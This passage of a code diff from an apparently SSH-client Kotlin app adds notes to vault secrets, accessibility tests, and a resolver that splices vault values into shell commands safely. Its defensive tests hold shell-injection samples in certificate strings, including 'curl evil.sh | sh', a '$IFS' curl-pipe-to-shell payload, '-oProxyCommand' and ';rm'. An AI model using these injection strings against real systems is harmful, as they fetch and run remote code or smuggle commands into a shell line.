         runForm({ SnippetRunDialog(manager) }) {
-            val drawn = onRoot(useUnmergedTree = true).fetchSemanticsNode().allText()
+            val drawn = drawnText()
             assertTrue(
                 drawn.any { it.contains("<U+0007>") },
                 "the control byte is spelled out in the previewed line, was $drawn",
@@ -191,7 +193,7 @@ class UntrustedSnippetTextTest {
         try {
             runner.requestStart(runbook, silentTarget())
             runForm({ RunbookStartDialog(runner) }) {
-                val drawn = onRoot(useUnmergedTree = true).fetchSemanticsNode().allText()
+                val drawn = drawnText()
                 assertTrue(
                     drawn.any { it.contains("<U+0007>") },
                     "the control byte is spelled out where the user reads the line, was $drawn",
@@ -396,6 +398,4 @@ class UntrustedSnippetTextTest {
         return own + children.flatMap { it.liveRegionText() }
     }
 
-    private fun SemanticsNode.allText(): List<String> =
-        config.getOrNull(SemanticsProperties.Text).orEmpty().map { it.text } + children.flatMap { it.allText() }
 }

--- a/composeApp/src/desktopTest/kotlin/app/skerry/ui/snippet/VaultRefAnnouncementTest.kt
+++ b/composeApp/src/desktopTest/kotlin/app/skerry/ui/snippet/VaultRefAnnouncementTest.kt
@@ -1,0 +1,117 @@
+package app.skerry.ui.snippet
+
+import androidx.compose.runtime.mutableStateMapOf
+import androidx.compose.ui.semantics.LiveRegionMode
+import androidx.compose.ui.semantics.SemanticsProperties
+import androidx.compose.ui.test.ExperimentalTestApi
+import androidx.compose.ui.test.SemanticsMatcher
+import androidx.compose.ui.test.assertContentDescriptionEquals
+import app.skerry.ui.desktop.drawnText
+import app.skerry.ui.desktop.runForm
+import app.skerry.ui.desktop.string
+import app.skerry.ui.generated.resources.Res
+import app.skerry.ui.generated.resources.lib_snippet_vars_vault_ambiguous
+import app.skerry.ui.generated.resources.lib_snippet_vars_vault_missing
+import app.skerry.ui.generated.resources.lib_snippet_vars_vault_more
+import app.skerry.ui.generated.resources.lib_snippet_vars_vault_ready
+import app.skerry.ui.generated.resources.lib_snippet_vars_vault_reading
+import app.skerry.ui.generated.resources.lib_snippet_vars_vault_unusable
+import kotlin.test.Test
+import kotlin.test.assertTrue
+
+/**
+ * A key reference resolves after the confirmation is already open and focus has moved on, so the
+ * outcome has to be spoken. What decides whether it is spoken is not the modifier but the shape: the
+ * announcing node carries the text itself and outlives the change, and it stays silent until every
+ * reference has answered — a half-resolved block would announce twice for one dialog.
+ */
+@OptIn(ExperimentalTestApi::class)
+class VaultRefAnnouncementTest {
+
+    private val polite = SemanticsMatcher.expectValue(SemanticsProperties.LiveRegion, LiveRegionMode.Polite)
+
+    private fun values(vararg refs: String) = values(refs.toList())
+
+    private fun values(refs: List<String>) = TemplateVariableValues(
+        paramNames = emptyList(),
+        paramChoices = emptyMap(),
+        vaultRefs = refs,
+        needsClipboard = false,
+        params = mutableStateMapOf(),
+    )
+
+    @Test
+    fun `the block says nothing until every reference has answered`() {
+        val v = values("prod-db", "temp_pubkey")
+        v.vaultResolutions = mapOf("prod-db" to VaultRef.Ok("s3cret", secret = true))
+
+        runForm({ TemplateVariableFields(v, autoFocus = false) }) {
+            onNode(polite).assertContentDescriptionEquals("")
+            // And the row itself says the look-up is still running rather than claiming the entry is
+            // missing — the state the `null` arm exists for.
+            assertTrue(
+                drawnText().any { it == string(Res.string.lib_snippet_vars_vault_reading, "temp_pubkey") },
+                "the unresolved row names its state, was ${drawnText()}",
+            )
+
+            v.vaultResolutions = v.vaultResolutions + ("temp_pubkey" to VaultRef.Ok("ssh-ed25519 AAAA", secret = false))
+            waitForIdle()
+
+            // The same node, a new description: a status change, not a node appearing. One sentence
+            // per reference, and neither the password nor the key is read out.
+            onNode(polite).assertContentDescriptionEquals(
+                string(Res.string.lib_snippet_vars_vault_ready, "prod-db") + ". " +
+                    string(Res.string.lib_snippet_vars_vault_ready, "temp_pubkey"),
+            )
+        }
+    }
+
+    @Test
+    fun `a template with more references than it is worth speaking counts the tail`() {
+        val names = (1..6).map { "entry-$it" }
+        val v = values(names)
+        v.vaultResolutions = names.associateWith { VaultRef.Ok("s3cret", secret = true) }
+
+        runForm({ TemplateVariableFields(v, autoFocus = false) }) {
+            // A shared template's reference count has no bound, and a live region cannot be scrolled
+            // past: five are named, the rest are counted in words rather than dropped in silence.
+            onNode(polite).assertContentDescriptionEquals(
+                names.take(5).joinToString(". ") { string(Res.string.lib_snippet_vars_vault_ready, it) } +
+                    ". " + string(Res.plurals.lib_snippet_vars_vault_more, 1, 1),
+            )
+        }
+    }
+
+    @Test
+    fun `an entry name is filtered before it is spoken`() {
+        // Escapes, not the raw glyphs: an invisible character in source is unreviewable. The name
+        // comes from a template that may have been shared, and this string is the whole of what a
+        // screen-reader user gets — the rows they can re-read are filtered, so this must be too.
+        val v = values(listOf("prod\u202Edb"))
+        v.vaultResolutions = mapOf("prod\u202Edb" to VaultRef.Ok("s3cret", secret = true))
+
+        runForm({ TemplateVariableFields(v, autoFocus = false) }) {
+            onNode(polite).assertContentDescriptionEquals(string(Res.string.lib_snippet_vars_vault_ready, "proddb"))
+        }
+    }
+
+    @Test
+    fun `every outcome a reference can have is spoken as itself`() {
+        val v = values(listOf("ghost", "twins", "on-disk"))
+        v.vaultResolutions = mapOf(
+            "ghost" to VaultRef.Missing,
+            "twins" to VaultRef.Ambiguous,
+            "on-disk" to VaultRef.Unusable,
+        )
+
+        runForm({ TemplateVariableFields(v, autoFocus = false) }) {
+            // Three different reasons a run cannot proceed: "no such entry", "the name matches more
+            // than one" and "that entry has nothing to insert" are not the same sentence.
+            onNode(polite).assertContentDescriptionEquals(
+                string(Res.string.lib_snippet_vars_vault_missing, "ghost") + ". " +
+                    string(Res.string.lib_snippet_vars_vault_ambiguous, "twins") + ". " +
+                    string(Res.string.lib_snippet_vars_vault_unusable, "on-disk"),
+            )
+        }
+    }
+}

--- a/composeApp/src/desktopTest/kotlin/app/skerry/ui/vault/SecretNoteTest.kt
+++ b/composeApp/src/desktopTest/kotlin/app/skerry/ui/vault/SecretNoteTest.kt
@@ -1,0 +1,63 @@
+package app.skerry.ui.vault
+
+import androidx.compose.ui.test.ExperimentalTestApi
+import androidx.compose.ui.test.onNodeWithContentDescription
+import app.skerry.ui.desktop.drawnText
+import app.skerry.ui.desktop.runForm
+import app.skerry.ui.desktop.string
+import app.skerry.ui.generated.resources.Res
+import app.skerry.ui.generated.resources.vault_label_note
+import kotlin.test.Test
+import kotlin.test.assertEquals
+import kotlin.test.assertTrue
+
+/**
+ * The note under a secret's name: free-form stored text, filtered on the way to the screen the same
+ * way the host tooltip is. The keychain is personal, so this is defence in depth — but the note
+ * crosses devices over sync and nothing downstream re-checks it.
+ */
+@OptIn(ExperimentalTestApi::class)
+class SecretNoteTest {
+
+    @Test
+    fun `a secret without a note draws nothing at all`() {
+        runForm({ SecretNote(null) }) {
+            // Not an empty line reserving height under every name that has no remark.
+            assertEquals(emptyList(), drawnText())
+        }
+    }
+
+    @Test
+    fun `a note that filters away to nothing draws nothing`() {
+        // Escapes, not the raw glyphs: an invisible character in source is unreviewable.
+        runForm({ SecretNote("\u200B\u202E") }) {
+            assertTrue(drawnText().all { it.isBlank() }, "was ${drawnText()}")
+        }
+    }
+
+    @Test
+    fun `a note keeps its own line breaks — it is prose, not a label`() {
+        runForm({ SecretNote("audit access\ndrop after 2026-09-01") }) {
+            assertTrue(drawnText().any { it.contains("audit access\ndrop after 2026-09-01") }, "was ${drawnText()}")
+        }
+    }
+
+    @Test
+    fun `a note drops the characters that would let it draw as something else`() {
+        runForm({ SecretNote("prod\u202Edb key") }) {
+            val drawn = drawnText()
+            assertTrue(drawn.any { it.contains("proddb key") }, "the text still reads, was $drawn")
+            assertTrue(drawn.none { it.any { c -> c.category == CharCategory.FORMAT } }, "was $drawn")
+        }
+    }
+
+    @Test
+    fun `the note names itself for a reader who cannot see where it sits`() {
+        runForm({ SecretNote("audit access") }) {
+            // A description replaces the node's own text rather than joining it, so the label and the
+            // note have to be joined here or the note itself would go unannounced.
+            onNodeWithContentDescription(string(Res.string.vault_label_note) + ", audit access").assertExists()
+        }
+    }
+
+}

--- a/composeApp/src/desktopTest/kotlin/app/skerry/ui/vault/VaultDialogFormTest.kt
+++ b/composeApp/src/desktopTest/kotlin/app/skerry/ui/vault/VaultDialogFormTest.kt
@@ -16,6 +16,7 @@ import app.skerry.ui.generated.resources.Res
 import app.skerry.ui.generated.resources.vault_field_certificate
 import app.skerry.ui.generated.resources.vault_field_key_path
 import app.skerry.ui.generated.resources.vault_field_name
+import app.skerry.ui.generated.resources.vault_field_note
 import app.skerry.ui.generated.resources.vault_field_password
 import app.skerry.ui.generated.resources.vault_field_private_key_pem
 import kotlin.test.Test
@@ -124,11 +125,11 @@ class VaultDialogFormTest {
         assertEquals(KEY_PATH, created?.second)
     }
 
-    /** Renaming to the same label is a sync push with nothing in it, so the button stays shut. */
+    /** Saving the same name and note is a sync push with nothing in it, so the button stays shut. */
     @Test
-    fun `renaming to the same label changes nothing`() {
+    fun `re-saving an unchanged secret changes nothing`() {
         var renamed: String? = null
-        runForm({ RenameSecretDialog(currentLabel = NAME, onDismiss = {}, onConfirm = { renamed = it }) }) {
+        runForm({ EditSecretDialog(currentLabel = NAME, currentNote = null, onDismiss = {}, onConfirm = { label, _ -> renamed = label }) }) {
             onNodeWithTag(UiTags.FORM_SAVE).assertIsNotEnabled()
 
             onField(Res.string.vault_field_name).performTextReplacement(RENAMED)
@@ -136,6 +137,58 @@ class VaultDialogFormTest {
             waitForIdle()
         }
         assertEquals(RENAMED, renamed)
+    }
+
+    /** Renaming must not cost the note: the field opens prefilled and is handed back untouched. */
+    @Test
+    fun `an existing note survives a rename that never touches it`() {
+        var saved: Pair<String, String?>? = null
+        runForm({
+            EditSecretDialog(
+                currentLabel = NAME,
+                currentNote = "drop after the audit",
+                onDismiss = {},
+                onConfirm = { label, note -> saved = label to note },
+            )
+        }) {
+            onField(Res.string.vault_field_name).performTextReplacement(RENAMED)
+            onNodeWithTag(UiTags.FORM_SAVE).assertIsEnabled().performClick()
+            waitForIdle()
+        }
+        assertEquals(RENAMED to "drop after the audit", saved)
+    }
+
+    /** Emptying the field means "no note", not "a note that is empty" — the store keys off null. */
+    @Test
+    fun `clearing the note hands back null`() {
+        var saved: Pair<String, String?>? = null
+        runForm({
+            EditSecretDialog(
+                currentLabel = NAME,
+                currentNote = "drop after the audit",
+                onDismiss = {},
+                onConfirm = { label, note -> saved = label to note },
+            )
+        }) {
+            onField(Res.string.vault_field_note).performTextReplacement("   ")
+            onNodeWithTag(UiTags.FORM_SAVE).assertIsEnabled().performClick()
+            waitForIdle()
+        }
+        assertEquals(NAME to null, saved)
+    }
+
+    /** The note alone is enough of a change: a secret can be re-annotated without being renamed. */
+    @Test
+    fun `editing only the note enables save and normalizes it`() {
+        var saved: Pair<String, String?>? = null
+        runForm({ EditSecretDialog(currentLabel = NAME, currentNote = null, onDismiss = {}, onConfirm = { label, note -> saved = label to note }) }) {
+            onNodeWithTag(UiTags.FORM_SAVE).assertIsNotEnabled()
+
+            onField(Res.string.vault_field_note).performTextReplacement("  temp access for the audit  ")
+            onNodeWithTag(UiTags.FORM_SAVE).assertIsEnabled().performClick()
+            waitForIdle()
+        }
+        assertEquals(NAME to "temp access for the audit", saved)
     }
 }
 

--- a/shared/src/commonMain/kotlin/app/skerry/shared/host/Host.kt
+++ b/shared/src/commonMain/kotlin/app/skerry/shared/host/Host.kt
@@ -4,6 +4,8 @@ import app.skerry.shared.ai.AiPolicy
 import app.skerry.shared.container.ContainerSpec
 import app.skerry.shared.rdp.RdpSpec
 import app.skerry.shared.ssh.ConnectionType
+import app.skerry.shared.text.MAX_NOTES_LENGTH
+import app.skerry.shared.text.normalizeNotes
 import kotlinx.serialization.Serializable
 
 /**

--- a/shared/src/commonMain/kotlin/app/skerry/shared/snippet/SnippetVaultValue.kt
+++ b/shared/src/commonMain/kotlin/app/skerry/shared/snippet/SnippetVaultValue.kt
@@ -1,0 +1,91 @@
+package app.skerry.shared.snippet
+
+import app.skerry.shared.vault.Credential
+import app.skerry.shared.vault.CredentialSecret
+
+/**
+ * What a `${'$'}{{vault:name}}` reference puts on the command line.
+ *
+ * The rule is the one the Vault panel already shows, minus what a shell would read as syntax: a
+ * password for a password, the OpenSSH public line for a key, and a certificate's type and blob —
+ * not the trailing comment the panel's Copy button includes (see [certificateFields]). Nothing else
+ * leaves the vault: the private half of a key is never spliced into a command, whatever the template
+ * asks for.
+ */
+sealed interface SnippetVaultValue {
+    /**
+     * Material that must not be printed: masked in every preview and confirmation
+     * ([app.skerry.shared.snippet] callers pass it through the mask), sent only on confirm.
+     */
+    data class Secret(val value: String) : SnippetVaultValue {
+        override fun toString(): String = "Secret(redacted)"
+    }
+
+    /**
+     * Public material — a key's public half, a certificate. Shown in clear in the preview: masking it
+     * would hide which key a command is about to authorize while pretending to protect something
+     * that is published by design.
+     */
+    data class Public(val value: String) : SnippetVaultValue
+
+    /**
+     * The entry exists but has nothing a command line can carry: a file-backed secret (the material
+     * is on disk, and the path is device-local), or a key whose public half cannot be derived here
+     * (unreadable PEM, or a passphrase the vault does not hold).
+     */
+    data object Unusable : SnippetVaultValue
+}
+
+/**
+ * Resolves one `${'$'}{{vault:name}}` reference. [publicKeyOf] derives the OpenSSH public line of a
+ * private key ([app.skerry.shared.vault.SshKeyGenerator.inspect] in production) — passed in rather
+ * than called here because that parse is expensive and platform-backed, while this decision is pure
+ * and has to be testable without a crypto provider. A blank derivation counts as no derivation.
+ */
+fun snippetVaultValue(
+    credential: Credential,
+    publicKeyOf: (privateKeyPem: String, passphrase: String?) -> String?,
+): SnippetVaultValue = when (val secret = credential.secret) {
+    is CredentialSecret.Password -> SnippetVaultValue.Secret(secret.password)
+    is CredentialSecret.PrivateKey ->
+        publicKeyOf(secret.privateKeyPem, secret.passphrase)?.takeIf { it.isNotBlank() }
+            ?.let { SnippetVaultValue.Public(it) } ?: SnippetVaultValue.Unusable
+    // The certificate string is the whole point of a certificate entry, and it is public — but only
+    // its type and blob are handed over, never its trailing comment.
+    is CredentialSecret.Certificate ->
+        certificateFields(secret.certificate)?.let { SnippetVaultValue.Public(it) } ?: SnippetVaultValue.Unusable
+    is CredentialSecret.KeyFile -> SnippetVaultValue.Unusable
+}
+
+/**
+ * Characters an OpenSSH key type may hold (`ssh-ed25519-cert-v01@openssh.com`, `rsa-sha2-512`), and
+ * never a leading `-`: nothing validates this field on import, and a value that starts with a dash
+ * is an option to whatever the template hands it to, not an argument.
+ */
+private val CERTIFICATE_TYPE = Regex("[A-Za-z0-9._@][A-Za-z0-9._@-]*")
+
+/** Characters a base64 blob may hold. */
+private val CERTIFICATE_BLOB = Regex("[A-Za-z0-9+/=]+")
+
+/**
+ * A `*-cert.pub` line reduced to its type and base64 blob, or `null` when it is not one.
+ *
+ * The rest of the line is a comment written by whoever issued the certificate — an SSH CA operator,
+ * `step`, Teleport, `vault write ssh/sign` — and this value is spliced into a shell line the user
+ * then confirms. [sanitizeSnippetValue] flattens a value; it does not quote it, so `;`, `|` and
+ * `$(…)` in that comment would reach the remote shell as syntax. The key path already hands over a
+ * comment-less line (the generator builds one from the public blob); this makes the two agree.
+ *
+ * Both fields are checked character by character, not merely counted. Shell syntax needs no
+ * whitespace around it, so a type field of `ssh-ed25519-cert-v01@openssh.com;curl…|sh` would survive
+ * a field count — and the importer never looks at that field, it only base64-decodes the blob. The
+ * character rule also makes it irrelevant which whitespace set the split used: a line whose halves
+ * were welded together by an exotic separator no longer matches either pattern.
+ */
+private fun certificateFields(certificate: String): String? {
+    val fields = certificate.trim().split(Regex("\\s+")).filter { it.isNotEmpty() }
+    if (fields.size < 2) return null
+    val (type, blob) = fields
+    if (!CERTIFICATE_TYPE.matches(type) || !CERTIFICATE_BLOB.matches(blob)) return null
+    return "$type $blob"
+}

--- a/shared/src/commonMain/kotlin/app/skerry/shared/text/Notes.kt
+++ b/shared/src/commonMain/kotlin/app/skerry/shared/text/Notes.kt
@@ -1,18 +1,19 @@
-package app.skerry.shared.host
+package app.skerry.shared.text
 
 /**
- * Max length of a host note. Not a security boundary (notes only flow into Compose text / JSON —
+ * Max length of a stored note. Not a security boundary (notes only flow into Compose text / JSON —
  * no injection), but a guard against pathological input: a pasted log file would bloat the stored
- * profile (and the synced record) and slow the hover tooltip's layout.
+ * record (and the synced blob) and slow the hover tooltip's layout.
  */
 const val MAX_NOTES_LENGTH = 500
 
 /**
- * Canonicalize a host note: trim the edges and cap the length ([MAX_NOTES_LENGTH]); blank becomes
- * `null` (no note stored, so [Host.notes] tells "has a note" apart from "has an empty note" — the
- * hover tooltip and the mobile Details row both key off `null`). Inner line breaks are kept: a note
- * is free-form text, not a label. Lives in `shared` because notes are *stored* in this form —
- * every write path must go through the same normalization.
+ * Canonicalize a note — a free-form remark on a host profile ([app.skerry.shared.host.Host.notes])
+ * or a keychain secret ([app.skerry.shared.vault.Credential.note]): trim the edges and cap the
+ * length ([MAX_NOTES_LENGTH]); blank becomes `null` (no note stored, so the field tells "has a note"
+ * apart from "has an empty note" — the hover tooltip and the detail rows both key off `null`). Inner
+ * line breaks are kept: a note is free-form text, not a label. Lives in `shared` because notes are
+ * *stored* in this form — every write path must go through the same normalization.
  */
 fun normalizeNotes(raw: String): String? = capNotes(raw.trim()).ifBlank { null }
 

--- a/shared/src/commonMain/kotlin/app/skerry/shared/vault/Credential.kt
+++ b/shared/src/commonMain/kotlin/app/skerry/shared/vault/Credential.kt
@@ -83,14 +83,22 @@ sealed interface CredentialSecret {
  * ([app.skerry.shared.host.Host.credentialId]): one secret can serve multiple hosts. The whole
  * thing — including [label] — lives in the encrypted payload of a [RecordType.CREDENTIAL] record:
  * [VaultRecord]'s plaintext metadata must not reveal key names or types (zero-knowledge). For the
- * same reason `toString` redacts [label] and [secret], leaving only [id] (already plaintext in
- * the metadata).
+ * same reason `toString` redacts [label], [note] and [secret], leaving only [id] (already plaintext
+ * in the metadata).
+ *
+ * [note] is an optional free-form remark ("temp access for the audit, delete in May"), the keychain's
+ * counterpart of [app.skerry.shared.host.Host.notes] and normalized the same way
+ * ([app.skerry.shared.text.normalizeNotes]). A record written before the field existed reads back
+ * with `null` — unknown keys are ignored and the default fills in, so no migration is needed. It is
+ * a remark about a secret, not a second secret, but it sits in the same encrypted payload as the
+ * material it describes and is redacted from logs with it.
  */
 @Serializable
 data class Credential(
     val id: String,
     val label: String,
     val secret: CredentialSecret,
+    val note: String? = null,
 ) {
-    override fun toString(): String = "Credential(id=$id, label=redacted, secret=redacted)"
+    override fun toString(): String = "Credential(id=$id, label=redacted, note=redacted, secret=redacted)"
 }

--- a/shared/src/commonMain/kotlin/app/skerry/shared/vault/CredentialStore.kt
+++ b/shared/src/commonMain/kotlin/app/skerry/shared/vault/CredentialStore.kt
@@ -34,19 +34,41 @@ class CredentialStore(
     }
 
     /**
-     * Renames a secret in place: keeps its [Credential.id] (hosts reference secrets by id, not label)
-     * and its secret material, replacing only the [Credential.label]. The re-[put] bumps the record
-     * version, so the change propagates to other devices via sync like any other edit. No-op if [id]
-     * is missing or deleted — a tombstone must not be resurrected under a new name.
+     * [put] for the forms, which build a whole [Credential] from their fields and have no note field:
+     * the stored [Credential.note] is kept rather than blanked. Read and write are one
+     * [Vault.transaction] for the same reason [edit] is — a merge landing between them would let the
+     * write carry a note the record no longer has, or drop one it just gained.
+     *
+     * A record that does not exist yet keeps whatever the caller passed, which is how a freshly
+     * created secret can still be born with a note. A **deleted** one is left alone, as in [edit]:
+     * [get] answers `null` for a tombstone as well as for an absent id, and writing through that
+     * would raise the deleted secret from the dead on every synced device.
+     */
+    fun putKeepingNote(credential: Credential) = vault.transaction {
+        if (isTombstoned(credential.id)) return@transaction
+        val stored = get(credential.id)
+        put(if (stored == null) credential else credential.copy(note = stored.note))
+    }
+
+    /** Whether [id] is a credential this vault has already deleted (as opposed to never seen). */
+    private fun isTombstoned(id: String): Boolean =
+        vault.records().any { it.id == id && it.type == RecordType.CREDENTIAL && it.deleted }
+
+    /**
+     * Edits what a secret is called in place: keeps its [Credential.id] (hosts reference secrets by id, not
+     * label) and its secret material, replacing only the [Credential.label] and [Credential.note].
+     * The re-[put] bumps the record version, so the change propagates to other devices via sync like
+     * any other edit. No-op if [id] is missing or deleted — a tombstone must not be resurrected under
+     * a new name.
      *
      * The read-check-write runs in one [Vault.transaction] (like [app.skerry.shared.host.VaultHostStore]):
      * otherwise a concurrent [Vault.mergeRemote] from background sync could land a tombstone between the
      * [get] and the [put], and the [put] would resurrect the deleted record under the new label and push
      * that un-delete to every device.
      */
-    fun rename(id: String, label: String) = vault.transaction {
+    fun edit(id: String, label: String, note: String?) = vault.transaction {
         val existing = get(id) ?: return@transaction
-        put(existing.copy(label = label))
+        put(existing.copy(label = label, note = note))
     }
 
     /** Soft-delete a secret (tombstone). Hosts referencing it are reconciled in the UI layer. */

--- a/shared/src/commonTest/kotlin/app/skerry/shared/snippet/SnippetVaultValueTest.kt
+++ b/shared/src/commonTest/kotlin/app/skerry/shared/snippet/SnippetVaultValueTest.kt
@@ -1,0 +1,154 @@
+package app.skerry.shared.snippet
+
+import app.skerry.shared.vault.Credential
+import app.skerry.shared.vault.CredentialSecret
+import kotlin.test.Test
+import kotlin.test.assertEquals
+
+private const val PUBLIC_LINE = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAI temp"
+
+class SnippetVaultValueTest {
+
+    private fun credential(secret: CredentialSecret) = Credential("c-1", "temp_pubkey", secret)
+
+    private fun resolve(secret: CredentialSecret, publicKey: String? = PUBLIC_LINE) =
+        snippetVaultValue(credential(secret)) { _, _ -> publicKey }
+
+    @Test
+    fun `a password resolves to a secret value`() {
+        assertEquals(SnippetVaultValue.Secret("s3cret"), resolve(CredentialSecret.Password("s3cret")))
+    }
+
+    @Test
+    fun `a private key resolves to its public half, never the private one`() {
+        val pem = "-----BEGIN OPENSSH PRIVATE KEY-----\nprivate\n"
+
+        val value = resolve(CredentialSecret.PrivateKey(pem, passphrase = "pp"))
+
+        assertEquals(SnippetVaultValue.Public(PUBLIC_LINE), value)
+    }
+
+    @Test
+    fun `the passphrase is offered to the derivation so an encrypted key still resolves`() {
+        var seen: Pair<String, String?>? = null
+        snippetVaultValue(credential(CredentialSecret.PrivateKey("pem", passphrase = "pp"))) { pem, pass ->
+            seen = pem to pass
+            PUBLIC_LINE
+        }
+
+        assertEquals("pem" to "pp", seen)
+    }
+
+    @Test
+    fun `a key whose public half cannot be derived is unusable`() {
+        assertEquals(SnippetVaultValue.Unusable, resolve(CredentialSecret.PrivateKey("garbage"), publicKey = null))
+        assertEquals(SnippetVaultValue.Unusable, resolve(CredentialSecret.PrivateKey("garbage"), publicKey = "  "))
+    }
+
+    @Test
+    fun `a certificate resolves to its type and blob, without the issuer's comment`() {
+        // The comment is written by whoever issued the certificate, and this value is spliced into a
+        // shell line: `;` and `|` in it would reach the remote shell as syntax, because the value
+        // sanitizer flattens a value without quoting it.
+        val value = resolve(
+            CredentialSecret.Certificate(
+                privateKeyPem = "pem",
+                certificate = "ssh-ed25519-cert-v01@openssh.com AAAA bastion; curl evil.sh | sh",
+            ),
+        )
+
+        assertEquals(SnippetVaultValue.Public("ssh-ed25519-cert-v01@openssh.com AAAA"), value)
+    }
+
+    @Test
+    fun `shell syntax welded onto the type field is unusable, not spliced`() {
+        // Nothing validates the type field on import — the inspector only base64-decodes the blob —
+        // and `;` needs no whitespace around it, so counting fields would have let this through.
+        val value = resolve(
+            CredentialSecret.Certificate(
+                privateKeyPem = "pem",
+                certificate = "ssh-ed25519-cert-v01@openssh.com;curl\u0024IFS-sfhttp://evil/x|sh AAAA",
+            ),
+        )
+
+        assertEquals(SnippetVaultValue.Unusable, value)
+    }
+
+    @Test
+    fun `the field split knows every separator the certificate reader does`() {
+        // U+000B separates fields for the certificate inspector too. A splitter that did not know it
+        // would weld the type and the blob into one field and hand back the *comment* as the second —
+        // the comment being what the trim exists to drop.
+        val value = resolve(
+            CredentialSecret.Certificate(
+                privateKeyPem = "pem",
+                certificate = "ssh-ed25519-cert-v01@openssh.com\u000BAAAA ;curl evil.sh|sh",
+            ),
+        )
+
+        assertEquals(SnippetVaultValue.Public("ssh-ed25519-cert-v01@openssh.com AAAA"), value)
+    }
+
+    @Test
+    fun `a type field that would read as an option is unusable`() {
+        // The import dialog never looks at this field — it only base64-decodes the blob — so
+        // `-oProxyCommand=…` imports cleanly and would then be handed to a command as an option.
+        val value = resolve(
+            CredentialSecret.Certificate(privateKeyPem = "pem", certificate = "-oProxyCommand AAAA"),
+        )
+
+        assertEquals(SnippetVaultValue.Unusable, value)
+    }
+
+    @Test
+    fun `shell syntax in the blob field is unusable too`() {
+        // The other operand. Every rejection case above puts the attack in the type field, so a
+        // loosened blob class would go unnoticed — and the blob is the half the importer decodes,
+        // which says nothing about what a shell would make of it.
+        val value = resolve(
+            CredentialSecret.Certificate(privateKeyPem = "pem", certificate = "ssh-ed25519-cert-v01@openssh.com AAAA;rm"),
+        )
+
+        assertEquals(SnippetVaultValue.Unusable, value)
+    }
+
+    @Test
+    fun `a real certificate line survives the character rule intact`() {
+        // The permissive side: a type with digits and dots, and a blob with the base64 characters the
+        // short fixtures above never exercise. Tightening either class would break every real
+        // certificate while the rejection tests stayed green.
+        val cert = "ecdsa-sha2-nistp256-cert-v01@openssh.com AAAAB3+z/dGVzdA== ci@build.example.com"
+
+        val value = resolve(CredentialSecret.Certificate(privateKeyPem = "pem", certificate = cert))
+
+        assertEquals(SnippetVaultValue.Public("ecdsa-sha2-nistp256-cert-v01@openssh.com AAAAB3+z/dGVzdA=="), value)
+    }
+
+    @Test
+    fun `a certificate line with no blob at all is unusable`() {
+        val value = resolve(CredentialSecret.Certificate(privateKeyPem = "pem", certificate = "ssh-ed25519-cert-v01@openssh.com"))
+
+        assertEquals(SnippetVaultValue.Unusable, value)
+    }
+
+    @Test
+    fun `a certificate entry with no certificate in it is unusable`() {
+        // Same rule as a key whose public half will not come out: a reference with nothing behind it
+        // must fail the confirmation, not splice an empty string.
+        val value = resolve(CredentialSecret.Certificate(privateKeyPem = "pem", certificate = "  "))
+
+        assertEquals(SnippetVaultValue.Unusable, value)
+    }
+
+    @Test
+    fun `a file-backed secret is unusable — its material never entered the vault`() {
+        val value = resolve(CredentialSecret.KeyFile(privateKeyRef = "~/.ssh/id_ed25519"))
+
+        assertEquals(SnippetVaultValue.Unusable, value)
+    }
+
+    @Test
+    fun `a secret value does not print itself`() {
+        assertEquals("Secret(redacted)", SnippetVaultValue.Secret("s3cret").toString())
+    }
+}

--- a/shared/src/commonTest/kotlin/app/skerry/shared/text/NotesTest.kt
+++ b/shared/src/commonTest/kotlin/app/skerry/shared/text/NotesTest.kt
@@ -1,10 +1,13 @@
-package app.skerry.shared.host
+package app.skerry.shared.text
 
+import app.skerry.shared.host.Host
+import app.skerry.shared.vault.Credential
+import app.skerry.shared.vault.CredentialSecret
 import kotlin.test.Test
 import kotlin.test.assertEquals
 import kotlin.test.assertNull
 
-class HostNotesTest {
+class NotesTest {
 
     @Test
     fun trims_and_maps_blank_to_null() {
@@ -48,5 +51,10 @@ class HostNotesTest {
     @Test
     fun host_notes_default_to_null_for_profiles_saved_before_the_field_existed() {
         assertNull(Host(id = "1", label = "web", address = "10.0.0.1", username = "root").notes)
+    }
+
+    @Test
+    fun credential_notes_default_to_null_for_secrets_saved_before_the_field_existed() {
+        assertNull(Credential(id = "c-1", label = "prod root", secret = CredentialSecret.Password("x")).note)
     }
 }

--- a/shared/src/commonTest/kotlin/app/skerry/shared/vault/CredentialStoreTest.kt
+++ b/shared/src/commonTest/kotlin/app/skerry/shared/vault/CredentialStoreTest.kt
@@ -105,60 +105,61 @@ class CredentialStoreTest {
     }
 
     @Test
-    fun `rename changes the label and keeps the id and secret`() {
+    fun `edit changes the label and keeps the id and secret`() {
         val store = CredentialStore(FakeVault())
         val secret = CredentialSecret.PrivateKey(privateKeyPem = "pem", passphrase = "pp")
         store.put(Credential("c-1", "old name", secret))
 
-        store.rename("c-1", "new name")
+        store.edit("c-1", "new name", note = null)
 
         assertEquals(Credential("c-1", "new name", secret), store.get("c-1"))
     }
 
     @Test
-    fun `rename bumps the record version so the change propagates to sync`() {
+    fun `edit bumps the record version so the change propagates to sync`() {
         val vault = FakeVault()
         val store = CredentialStore(vault)
         store.put(Credential("c-1", "old", CredentialSecret.Password("s")))
 
-        store.rename("c-1", "new")
+        store.edit("c-1", "new", note = null)
 
-        // A rename is a re-put of the same id: the version must advance so LWW/live-sync push it.
+        // An edit is a re-put of the same id: the version must advance so LWW/live-sync push it.
         assertEquals(2L, vault.records().single { it.id == "c-1" }.version)
     }
 
     @Test
-    fun `rename of a missing id is a no-op`() {
+    fun `edit of a missing id is a no-op`() {
         val store = CredentialStore(FakeVault())
 
-        store.rename("ghost", "whatever")
+        store.edit("ghost", "whatever", note = null)
 
         assertNull(store.get("ghost"))
         assertEquals(emptyList(), store.all())
     }
 
     @Test
-    fun `rename runs its read-modify-write inside a single transaction`() {
+    fun `edit runs its read-modify-write inside a single transaction`() {
         val vault = FakeVault()
         val store = CredentialStore(vault)
         store.put(Credential("c-1", "old", CredentialSecret.Password("s")))
         // A plain put is a single call and holds no transaction — the control for the assertion below.
         assertFalse(vault.lastPutInTransaction)
 
-        store.rename("c-1", "new")
+        store.edit("c-1", "new", note = null)
 
-        // rename's put must run under a held transaction so a concurrent mergeRemote can't slip a
-        // tombstone between the get and the put (TOCTOU resurrection across all synced devices).
+        // edit's read AND its put must run under a held transaction, or a concurrent mergeRemote can
+        // slip a tombstone between them (TOCTOU resurrection across all synced devices).
+        assertTrue(vault.lastReadInTransaction)
         assertTrue(vault.lastPutInTransaction)
     }
 
     @Test
-    fun `rename does not resurrect a deleted credential`() {
